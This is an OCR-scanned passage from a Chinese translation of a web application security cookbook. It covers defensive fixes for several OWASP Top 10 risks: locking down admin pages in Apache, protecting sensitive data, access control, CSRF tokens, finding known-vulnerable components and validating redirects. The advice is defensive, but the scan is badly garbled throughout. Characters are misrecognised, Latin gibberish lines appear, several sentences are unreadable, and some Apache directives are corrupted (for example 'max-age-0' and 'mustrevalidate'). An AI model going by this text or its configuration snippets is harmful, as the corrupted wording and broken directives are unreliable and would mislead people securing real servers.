PhpMyAdmin， 或 者 Tomcat Manager。 如 果 不 能 这 样 ， 使 它们 只 能 从 本 地 网 络 访问 ， 例 
如 ， 在 Apache 服务 器 中 禁止 来 自 外 部 网 络 的 PhpMyAdmin 访问 ， 修 改 httd.conf 文件 
(或 者 相应 的 站 点 配置 文件 ) 。 


«Directory /var/www/phpmyadmin> 


Order Deny,Allow 

Deny from all 

Allow from 127.0.0.1 ::1 
Allow from localhost 
Allow from 192.168 
Satisfy Any 


</Directory> 


这 会 首先 禁止 所 有 地 址 到 phpmyadmin 目录 的 访问 ， 之 后 它 允 许 任何 来 自 locaohost 和 
以 192.168 开头 的 地 址 的 请 求 ， 这 是 本 地 网 络 的 地 址 。 


2. 修改 所 有 CMS、 上 应用、 数据库、 服务器 和 框架 的 所 有 管理 员 密 码 ， 使 其 强度 足够 。 一 些 
应 用 的 例子 是 : 


o Cpanel 

o Joomla 

o WordPress 

o PhpMyAdmin 

o Tomcat manager 


3， 禁 用 所 有 不 必要 或 未 使 用 的 服务 器 和 应 用 特性 。 从 上 日常 或 每 周 来 看 ， 新 的 漏洞 都 出 现在 
CMS 的 可 选 模块 和 播 件 中 。 如 果 你 的 应 用 不 需要 它们 ， 就 不 要 激活 它们 。 


4 始终 执行 最 新 的 安全 补丁 和 更 新 。 在 生成 环境 ， 建 立 测试 环境 来 预防 使 站 点 不 工作 的 缺 
陷 十 分 重要 ， 因 为 新 版 本 存在 一 些 兼 容 性 及 其 它 问题 。 


5， 建 立 不 会 泄露 跟踪 人 信息、 软件 版 本 、 程 序 组 件 名 称 ， 或 任何 其 它 调试 信息 的 自 定 义 的 错 
误 页 面 。 如 果 开 发 者 需要 跟踪 错误 记录 BERI 守 对 于 技术 支持 非 第 必要 ， 创 
建 带 有 简单 ID 和 错误 描述 的 索引 ， 并 只 展示 ID 给 用 户 。 所 以 当 错 误 报告 给 相关 人 士 的 
时 候 ， 它 们 会 检查 下 标 并 且 知 道 发 生 了 什么 


6， 采 取 “ 最 小 权限 原则 ”"。 每 个 用 户 在 每 个 层面 (操作 系统 、 数 据 库 、 或 应 用 ) 上 都 应 该 只 能 
够 严格 访问 正确 操作 所 需 的 信息 。 


7. 使 用 上 一 个 要 点 来 考虑 账户 ， 构 建安 全 配置 的 原则 ， 并 且 将 其 应 用 到 每 个 新 的 实现 、 更 
新 或 发 布 以 及 当前 系统 中 。 


8. 强制 定期 的 安全 测试 或 审计 ， 来 帮助 检测 错误 配置 或 遗漏 的 补丁 。 


工作 原理 


谈论 安全 和 配置 问题 时 ，" 细 节 决 定 成 败 " 十 分 恰当 。web 服务 器 、 数 据 库 服务 器 、CMS、 或 
者 应 用 配置 应 该 在 完全 可 用 和 实用 、 以 及 保护 用 户 和 拥有 者 之 间 取 得 平衡 。 


Web 应 用 的 一 个 常见 错误 配置 就 是 一 些 Web 管理 站 点 对 整个 互联 网 都 可 见 。 这 看 起 来 并 不 是 
个 大 问题 ， 但 是 我 们 应 该 知道 ， 管 理 员 登录 页 面 更 容易 吸引 攻击 者 ， 因 为 它 可 以 用 于 获得 高 
级 权限 等 级 ， 并 且 任 何 CMS、 数 据 或 者 站 点 管理 工具 都 存在 已 知 的 常用 默认 密码 列表 。 所 
以， 我 们 强烈 推荐 不 要 把 这 些 管理 站 点 暴露 给 外 部 ， 并 且 尺 可 能 移 除 它 们 。 


此 外 ， 强 冤 码 的 使 用 ， 以 及 修改 默认 考 码 (即使 它们 是 强 冤 码 ) ， 在 发 布 应 用 到 公司 内 部 网 
络 ， 以 及 互联 网 的 时 候 需 要 强制 执行 。 妆 今 ， pinta 器 开放 给 外 部 的 时 候 ， 它 收 到 的 


第 一 个 流量 就 是 端口 扫描 ， 登 录 页 面 请 求 ， 以 及 登录 尝试 ， 甚 至 在 第 一 个 用 户 知 道 该 应 用 之 
8i e 

自 定 义 错 误 页 面 的 使 用 有 助 于 安全 准备 ， 因 为 Web 服务 器 用 中 的 默认 的 错误 信息 展示 太 
的 信息 (从 攻击 者 角度 ) ， 它 们 关于 错误 、 所 使 用 的 编程 语言 、 栈 回溯 、 所 使 用 的 数据 


VPN amma vcn qon quete qu pata M p 
d 共 所 使 用 软件 的 版 本 和 名 称 。 攻 击 者 通过 这 些 信息 就 可 以 搜索 已 知 漏洞 ， 并 构造 更 加 有 效 
的 攻击 过 程 。 


一 旦 我 们 的 服务 器 上 的 部 署 应 用 和 所 有 服务 都 正确 配置 ， 我 们 就 可 以 制订 安全 原则 并 且 将 其 
应 用 于 所 有 要 配置 的 新 服务 器 或 者 已 更 新 的 服务 器 ， 或 者 当前 带 有 合理 规划 的 生产 服务 器 。 


这 个 配置 原则 需要 持续 测试 ， 以 便 改 进 它 以 及 持续 保护 新 发 现 的 漏洞 。 


A6 保护 敏感 数据 


当 应 用 储存 或 使 用 敏感 信息 (信用 卡号 码 、 itj 、 健 康 记 录 ， 以 及 其 它 ) 时 ， 必 须 
采取 特殊 的 手段 来 保护 它们 ， 因 为 它 可 能 为 负责 保护 它们 的 组 织带 来 严重 的 信用 、 经 济 或 者 
法 律 损失 ， 以 及 被 攻破 。 


OWASP Top 10 的 第 六 名 是 敏感 数据 泄露 ， 它 发 生 在 应 该 保护 的 数据 以 纯 文本 泄露 ， 或 者 带 
有 弱 安 全 措施 的 时 候 。 


这 个 秘籍 中 ， 我 们 会 涉及 一 些 处 理 、 传 递 和 储存 这 种 数据 类 型 的 最 佳 实践 。 


操作 小 


1 如果 你 使 用 的 敏感 数据 可 以 在 使 用 之 后 删除 ， 那 么 删除 它 。 最 好 每 次 使 用 信用 卡 的 时 候 
WARP RARER 


2. 在 处 理 支付 的 时 候 ， 始 终 使 用 支付 网 关 ， 而 不 是 在 你 的 服务 器 中 储存 数 


看 . http://ecommerce-platforms.com/ ecommerce-selling-advice/choose-payment-gateway-e: 


Oo 


3， 如 果 我 们 需要 储存 敏 司 数据， 我们 要 采取 的 第 一 个 保护 就 是 使 用 强 蜜 码 萌 法 和 相应 的 强 
2 44 KZ 2t » dE 2 Twofish ` AES ` RSA 和 三 重 DES » 


4. ZAD HR IE RE E TAR ELA VALER v c] TO SER * lh > bcypt ^ scrypt 
或 SHA-2。 


5， 确 保 所 有 敏感 文档 只 ta 户 访 问 。 不 要 在 Web 服务 器 的 文档 根 目 录 储 存 它们 ， 
是 在 外 部 目录 储存 ， 并 通过 程序 来 访问 。 如 果 出 于 某 种 原因 必须 在 服务 器 的 文档 根 目录 
ppl Pied te 


Order deny,allow 
Deny from all 


à, 4- sk RELAE 89 AA o Blo ^ f Apache 中 我 们 可 以 禁用 PDF fe PNG 的 组 
4f * 33d httpd.conf 中 的 下 列 设置 : 


«FilesMatch "\.(pdf|png)> 

FileETag None 

Header unset ETag 

Header set Cache-Control "max-age-0, no-cache, no-store, mustrevalidate" 
Header set Pragma "no-cache" 

Header set Expires "Wed, 11 Jan 1984 05:00:00 GMT" 

«/FilesMatch» 


7. 如果 你 允许 文件 上 传 ， 始 终 使 用 安全 的 通信 频道 来 传输 敏感 数据 ， 也 就 是 带 有 TLS 的 
HTTPS ;或 者 FTPS (SSH 上 的 FTP) œ 


工作 原理 


对 于 保护 敏感 数据 ， 我 们 需要 最 小 化 数据 泄露 或 交易 的 风险 。 这 就 是 正确 加 密 储 存 敏 感 数 
据 ， 以 及 保护 加 密 密 钥 是 所 做 的 第 一 件 事 情 的 原因 。 如 果 可 能 不 需要 储存 这 类 数据 ， 这 只 是 
个 理想 3 选择 o 


密码 应 该 使 用 单 向 哈 希 算法 ， 在 将 它们 储存 到 数据 之 前 计算 哈 希 。 所 以 ， 即 使 它们 被 资 取 ， 
攻击 者 也 不 能 立即 使 用 它们 ， 并 且 如 果 竹 码 强 度 足 够 ， 险 硕 也 是 足够 强 的 算法 ， 它 就 不 会 在 
短 时 间 内 被 破解 。 


如 果 我 们 在 Apache 服务 器 的 文档 根 目录 ( /var/ www/html/ ) 储存 敏感 文档 或 数据 ， 我 们 就 
通过 URL 将 这 些 信息 暴露 用 于 下 载 。 所 以 ， 最 好 将 它 储存 到 别 的 地 方 ， 并 编写 特殊 的 服务 端 
代码 来 在 必要 时 获取 它们 ， 并 带 有 预先 的 授权 检查 。 


此 外 ， 例 如 Archive.org、WayBackMachine 或 者 Google 缓存 页 面 ， 可 能 在 缓存 含有 敏感 信 
息 的 文件 时 ， 以 及 我 们 没 能 在 应 用 的 上 一 个 版 本 有 效 保 护 它 们 时 产生 安全 问题 。 所 以 ， 不 允 
许 缓存 此 类 文档 非常 重要 。 


AT 确保 功能 级 别 的 访问 控制 
功能 级 别 的 访问 控制 是 访问 控制 的 一 种 ， 用 于 防止 匿名 者 或 未 授权 用 户 的 功能 调用 。 根 据 
OWASP ， 缺 乏 这 种 控制 是 Web 应 用 中 第 七 大 严重 的 安全 问题 。 


这 个 秘籍 中 ， 我 们 会 看 到 一 些 推荐 来 提升 我 们 的 应 用 在 功能 级 别 上 的 访问 控制 。 


dE p HR 
1. 确保 每 一 步 都 正确 检查 了 工作 流 的 权限 。 
2， 禁 止 所 有 默认 访问 ， 之 后 在 显示 的 授权 校 验 之 后 允许 访问 。 


3. 有 用户、 角色 和 授权 应 该 在 灵活 的 媒介 中 储存 ， 例 如 数据 库 或 者 配置 文件 ， 不 要 硬 编码 它 
们 。 


同样 ，“ 隐 藏 式 安全 "不 是 很 好 的 策略 。 


全 


工作 原理 


开发 者 只 在 工作 流 的 开始 检查 授权 ， 并 假设 下 面 的 步骤 都 已 经 对 用 户 授 权 ， 这 是 常见 的 现 
象 。 攻 击 者 可 能 会 尝试 调用 某 个 功能 ， 它 是 工作 流 的 中 间 步 又 ， 并 由 于 控制 缺失 而 能 够 访问 


Oo 


已 


对 于 权限 ， 默 认 禁 止 所 有 用 户 是 个 最 佳 实践 。 如 果 我 们 不 知道 一 些 用 户 是 否 有 权 访 问 一 些 功 
能 ， 那 么 它们 就 不 应 该 执行 。 将 你 的 权限 表 转 化 为 授权 表 。 如 果菜 些 用 户 在 茶 些 功能 上 没有 
显 式 的 授权 ， 则 禁止 它们 的 访问 。 


在 为 你 的 应 用 功能 构建 或 实现 访问 控制 机 制 的 时 候 ， 将 所 有 授权 储存 在 数据 库 中 ， 或 者 在 配 
置 文件 中 《数据 库 是 也 好 的 选项 ) 。 如 果 有 用户 角色 和 权限 被 硬 编 码 ， 它 们 就 会 难以 维护 、 修 
改 或 更 新 。 


A8 防止 CSRF 


3 Web 应 用 没有 使 用 会 话 层面 或 者 操作 层面 的 标识 ， 或 者 标识 没有 正确 实现 的 时 候 ， 它 们 就 
可 能 存在 跨 站 请 求 伪 造 漏洞 ， 并 且 攻 击 者 可 以 强迫 授权 用 户 执行 非 预期 的 操作 。 


CSRF 是 当今 Web 应 用 的 第 八大 严重 漏洞 ， 根 据 OWASP ， 并 且 我 们 在 这 个 秘籍 中 会 看 到 如 
Te]. Ez JE] "P ER ab o 


IRAE JE 
1， 第 一 步 也 是 最 实际 的 CSRF 解决 方案 就 是 实现 唯一 、 操 作 层 面 的 标识 。 所 以 每 次 用 户 党 


试 执行 某 个 操作 的 时 候 ， 会 生成 新 的 标识 并 在 服务 端 校 验 。 


2， 唯 一 标识 应 该 不 能 被 轻易 由 攻击 者 猜测 ， 所 以 它们 不 能 将 其 包含 在 CSRF 页 面 中 。 随 机 
生成 是 个 好 的 选择 。 


3， 在 每 个 可 能 为 CSRF 目标 的 表单 中 包含 要 发 送 的 标识 。“ 添 加 到 购物 车 ”请求 、 密 码 修 改 
表单 、 邮 件 、 联 系 方式 或 收 货 信 息 管 理 ， 以 及 银行 的 转账 页 面 都 是 很 好 的 例子 。 


4. 标识 应 该 在 每 次 请 求 中 发 送 给 服务 器 。 这 可 以 在 URL 中 实现 ， 或 者 任何 其 它 变量 或 者 隐 
藏 字段 ， 都 是 推荐 的 。 

5， 验 证 码 的 使 用 也 可 以 防止 CSRF e 

6. 同样 ， 在 一 些 关 键 操作 中 询问 重新 授权 也 是 个 最 佳 实践 ， 例 如 ， 银 行 应 用 中 的 转账 操 
4 


工作 原理 


防止 CSRF 完全 是 确保 验证 过 的 用 户 是 请 求 操作 的 人 。 由 于 浏览 器 和 Web 应 用 的 工作 方式 ， 
最 佳 实践 是 使 用 标识 来 验证 操作 ， 或 者 可 能 的 情况 下 使 用 验证 码 来 控制 。 


由 于 攻击 者 打算 党 试 破 解 标 识 的 生成 ， 或 者 验证 系统 ， 以 一 种 攻击 者 不 能 猜测 的 方式 ， 安 全 
地 生成 它们 非常 重要 。 而 且 要 使 它们 对 每 个 用 户 和 每 个 操作 都 唯一 ， 因 为 复 用 它们 会 偏离 它 
们 的 目的 。 


验证 码 控 制 和 重新 授权 有 时 候 会 非常 麻烦， 使 用 户 反感 。 但 是 如 果 操 作 的 重要 性 值得 这 人 么 
人 做， 用户 可 能 愿意 接受 它们 来 换取 额外 的 安全 级 别 。 


j JL 


有 一 些 编程 库 有 助 于 实现 CSRF 防护 ， 节 省 开发 者 的 大 量 工作 。 例 子 之 一 就 是 OWASP 的 
CSRF Guard : https://www.owasp.org/index.php/CSRFGuard ° 


A9 在 哪里 寻找 三 万 组 件 的 已 知 漏洞 


现在 的 Wbe 应 用 不 再 是 单个 开发 者 ， 也 不 是 单个 开发 团队 的 作品 。 开 发 功能 性 、 用 户 友 好 、 
外 观 吸引 人 的 Web 应 用 涉及 到 三 方 组 件 的 使 用 ， 例 如 编程 库 ， 外 部 服务 的 API (Fackbook ^ 
Google ` Twitter) ， 开 发 框架 ， 以 及 许多 其 它 的 组 件 ， 其 中 编程 、 测 试 和 打 补 丁 的 工作 量 很 
少 ， 其 至 没有 。 


有 时 候 这 些 三 方 组 件 被 发 现存 在 漏洞 ， 并 且 它 们 将 这 些 漏洞 转移 到 了 我 们 的 应 用 中 。 许 多 带 
有 漏洞 组 件 的 应 用 很 长 时 间 都 没有 打 补 丁 ， 使 整个 组 织 的 安全 体系 中 出 现 缺 陷 。 这 就 是 
OWASP 将 使 用 带 有 已 知 漏洞 的 三 方 组 件 划 分 为 Web 应 用 安全 的 第 九 大 威胁 的 原因 。 


这 个 秘籍 中 ， 我 们 会 了 解 ， 如 果 一 些 我 们 所 使 用 的 组 件 拥有 已 知 漏洞 ， 应 该 到 哪里 寻找 ， 以 
及 我 们 会 查看 一 些 这 种 漏洞 组 件 的 例子 。 


dE v 3 
1， 第 一 个 建议 是 ， 优 先 选择 受 支 持 和 广泛 使 用 的 知名 软件 。 
2. 为 你 的 应 用 所 使 用 的 三 方 组 件 保 持 安 全 更 新 和 补丁 的 更 新 。 


3. 用 于 搜索 一 些 OU : 它们 通 第 拥有 "发布 说 明 "部 分 ， 
其 中 它们 会 公布 它们 纠正 了 哪个 bug 或 漏洞 。 这 里 我 们 可 以 寻找 我 们 所 使 用 的 〈 或 更 新 
的 ) 版 本 ， 并 且 插 件 是 否 有 有 已 知 的 问题 没有 打 补 丁 。 


4. 同样 ， 厂 商 通 第 拥有 安全 建议 站 点 ， 例 如 
Microsoft : hnttps://technet.microsoft.com/library/security/ ^? 
Joomla : https:// developer.joomla.org/security-centre.html ° fe 


Oracle : http://www. oracle.com/technetwork/topics/security/alerts-086861.html ° 我 们 


可 以 使 用 它们 来 保持 我 们 用 于 应 用 的 软件 的 更 新 。 


5， 也 有 一 些 厂商 无 关 的 站 点 ， 它 们 致力 于 通知 我 们 漏洞 和 安全 问题 。 有 个 非 第 好 的 网 站 ， 
集中 了 多 个 来 源 的 信息 ， 是 CVE Details ( http://www.cvedetails.com/ ) 。 这 里 我 们 可 
以 搜索 多 数 厂商 或 产品 ， 或 者 列 出 所 有 已 知 汤 洞 (至 少 是 拥有 CVE 号 码 的 漏洞 ) ， 并 且 
按照 年 份 、 版 本 和 CVSS 分 数 排列 。 


6， 同 时 ， 黑 客 发 布 利用 和 发 现 的 站 点 也 是 个 获得 漏洞 和 我 们 所 使 用 的 软件 的 信息 的 好 地 
X ° RAATI Æ Exploit DB ( nttps://ww.exploit-db.com/ ) ° Full disclosure 邮件 列表 
( http://seclists.org/fulldisclosure/ ) ， 以 及 Packet Storm 的 文件 部 分 


( https://packetstormsecurity.com/files/ ) $ 


7， 一 旦 我 们 发 现 了 我 们 软件 组 件 中 的 漏洞 ， 我 们 必须 评估 它 是 否 对 我 们 的 应 用 必要 ， 或 者 
需要 移 除 。 如 果 不 能 这 样 ， 我 们 需要 尽快 打 补 丁 。 如 果 没 有 可 用 的 补丁 或 变通 方案 ， 并 
且 漏 洞 是 高 危 的 ， 我 们 必须 开始 寻找 组 件 的 替代 。 


工作 原理 


考虑 在 我 们 的 应 用 中 使 用 三 方 软件 组 件 之 前 ， 我 们 需要 查看 它 的 安全 信息 ， 并 了 解 ， 我 们 所 
使 用 的 组 件 是 否 有 更 稳定 更 安全 的 版 本 或 替代 。 


一 旦 我 们 选择 了 某 个 ， 并 且 将 其 包含 到 我 们 的 应 用 中 ， 我 们 需要 使 其 保持 更 新 。 有 时 它 可 能 
涉及 到 版 本 改动 以 及 没有 后 向 兼容 ， 但 是 这 是 我 们 想 要 维持 安全 的 代价 。 如 果 我 们 不 能 更 新 
或 为 高 危 漏洞 打 补 丁 ， 我 们 还 可 以 使 用 WAF (Web 应 用 防火 墙 ) 和 IPS (入 侵 检 测 系统 ) 来 
防止 攻击 。 


除了 在 执行 渗透 测试 的 时 候 比 较 实 用 ， 下 载 和 漏洞 发 布 站 点 可 以 被 系统 管理 员 利 用 ， 用 于 了 
解 可 能 出 现 什 么 攻击 ， 它 们 的 原理 ， 以 及 如 何 保护 应 用 避免 它们 。 


A10 € £ IEE 


根据 OWASP， 未 验证 的 重 定向 和 转发 是 Web 应 用 的 第 十 大 严重 安全 问题 。 它 发 生 在 应 用 接 
Z URL. 或 内 部 页 面 作为 参数 来 执行 重 定向 或 转发 操作 的 时 候 。 如 果 参 数 没有 正确 验证 ， 攻 击 
者 就 能 够 滥用 它 来 使 其 重 定向 到 恶意 网 站 。 


这 个 秘籍 中 ， 我 们 会 了 解 如 何 验证 我 们 接受 的 用 于 重 定 向 或 转发 的 参数 ， 我 们 需要 在 开发 应 
用 的 时 候 实 现 它 。 
操作 步骤 

1， 不 希望 存在 漏洞 吗 ? 那 就 不 要 使 用 它 。 无 论 怎样 ， 都 不 要 使 用 重 定 向 和 转发 。 

2， 如 果 需 要 使 用 重 定向 ， 党 试 不 要 使 用 用 户 提 供 的 参数 (请求 变量 ) 来 计算 出 目标 。 


3， 如 果 需 要 使 用 和 参数， 实现 一 个 表 ， 将 其 作为 重 定向 的 目录 ， 使 用 ID 代替 URL 作为 用 户 
应 该 提供 的 参数 。 


4， 始 终 验 证 重 定向 和 转发 操作 涉及 到 的 输入 。 使 用 正则 表达 式 或 者 白 名 单 来 检查 提供 的 值 


REHA 


工作 原理 


重 定 向 和 转发 是 钓鱼 者 和 其 它 社会 工程 师 最 总 欢 用 的 工具 ， 并 且 有 时 候 我 们 对 目标 没有 任何 
安全 控制 。 所 以 ， 即 使 它 不 是 我 们 的 应 用 ， 它 的 安全 问题 也 会 影响 我 们 的 信誉 。 这 就 是 最 好 
不 要 使 用 它们 的 原因 。 


如 果 这 种 重 定 向 的 目标 是 已 知 站 点 ， 例 如 Fackbook 或 Google， 我 们 就 可 以 在 配置 文件 或 数 
据 表 中 建立 目标 目录 ， 并 且 不 需要 使 用 客户 端 提 供 的 参数 来 实现 。 


如 果 我 们 构建 包含 所 有 允许 的 重 定向 和 和 转发 URL 的 数据 表 ， 每 个 都 带 有 ID， 我 们 可 以 将 ID 
用 于 参数 ， 而 不 是 目标 本 身 。 这 是 一 种 白 名 单 的 形式 ， 可 以 防止 无 效 目标 的 播 入 。 


最 后 同样 是 校 验 。 我 们 始终 要 校 验 每 个 来 自 客 户 端的 输入 ， 这 非常 重要 ， 因 为 我 们 不 知道 用 
户 要 输入 什么 。 如 果 我 们 校 验 了 重 定 向 目标 的 正确 性 ， 除 了 恶意 转发 或 重 定 向 之 外 ， 我 们 还 
可 以 防止 可 能 的 SQL 注入 、XSS 或 者 目录 遍历。 所 以 ， 它 们 都 是 相关 的 。 


